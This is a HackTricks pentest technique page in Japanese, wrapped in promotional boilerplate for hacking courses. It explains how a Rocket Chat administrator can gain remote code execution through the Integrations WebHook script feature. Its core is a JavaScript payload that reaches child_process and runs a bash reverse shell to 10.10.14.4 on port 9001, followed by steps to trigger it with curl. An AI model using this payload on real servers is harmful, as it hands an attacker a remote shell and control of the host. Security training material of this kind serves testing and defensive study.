Rocket Chat
Reading time: 3 minutes
tip
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。
RCE
Rocket Chatの管理者であれば、RCEを取得できます。
- **
Integrations
に移動し、New Integration
を選択して、Incoming WebHook
またはOutgoing WebHook
**のいずれかを選択します。 /admin/integrations/incoming
.png)
- docsによると、両方ともES2015 / ECMAScript 6(基本的にJavaScript)を使用してデータを処理します。では、rev shell for javascriptを取得しましょう。
javascript
const require = console.log.constructor("return process.mainModule.require")()
const { exec } = require("child_process")
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
- WebHookを設定します(チャンネルと投稿のユーザー名が存在する必要があります):
.png)
- WebHookスクリプトを設定します:
.png)
- 変更を保存します
- 生成されたWebHook URLを取得します:
.png)
- curlで呼び出すと、rev shellを受け取るはずです
tip
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。